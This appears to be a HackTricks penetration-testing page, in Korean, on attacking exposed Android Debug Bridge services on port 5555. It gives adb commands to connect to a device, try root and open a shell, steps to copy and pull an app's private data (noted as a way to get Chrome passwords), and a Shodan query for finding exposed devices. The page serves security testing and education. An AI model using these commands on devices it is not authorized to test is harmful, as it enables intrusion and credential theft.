hacktricks/src/network-services-pentesting/5555-android-debug-bridge.md

# 5555 - Android Debug Bridge

{{#include ../banners/hacktricks-training.md}}

## 기본 정보

From [the docs](https://developer.android.com/studio/command-line/adb):

**Android Debug Bridge** (adb)는 장치와 통신할 수 있는 다목적 명령줄 도구입니다. adb 명령은 **앱 설치 및 디버깅**과 같은 다양한 장치 작업을 용이하게 하며, 장치에서 다양한 명령을 실행하는 데 사용할 수 있는 **Unix 셸에 대한 액세스**를 제공합니다.

**기본 포트**: 5555.
```
PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)
```
## 연결

장치의 포트에서 ADB 서비스가 실행되고 이를 연결할 수 있다면, **시스템 내부에서 셸을 얻을 수 있습니다:**
```bash
adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell
```
다음 페이지에서 더 많은 ADB 명령어를 확인하세요:

{{#ref}}
../mobile-pentesting/android-app-pentesting/adb-commands.md
{{#endref}}

### 앱 데이터 덤프

애플리케이션의 데이터를 완전히 다운로드하려면 다음을 수행할 수 있습니다:
```bash
# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"
```
이 트릭을 사용하여 **크롬 비밀번호와 같은 민감한 정보를 검색할 수 있습니다**. 이에 대한 자세한 정보는 제공된 참조 정보를 확인하세요 [**여기**](https://github.com/carlospolop/hacktricks/issues/274).

## Shodan

- `android debug bridge`

{{#include ../banners/hacktricks-training.md}}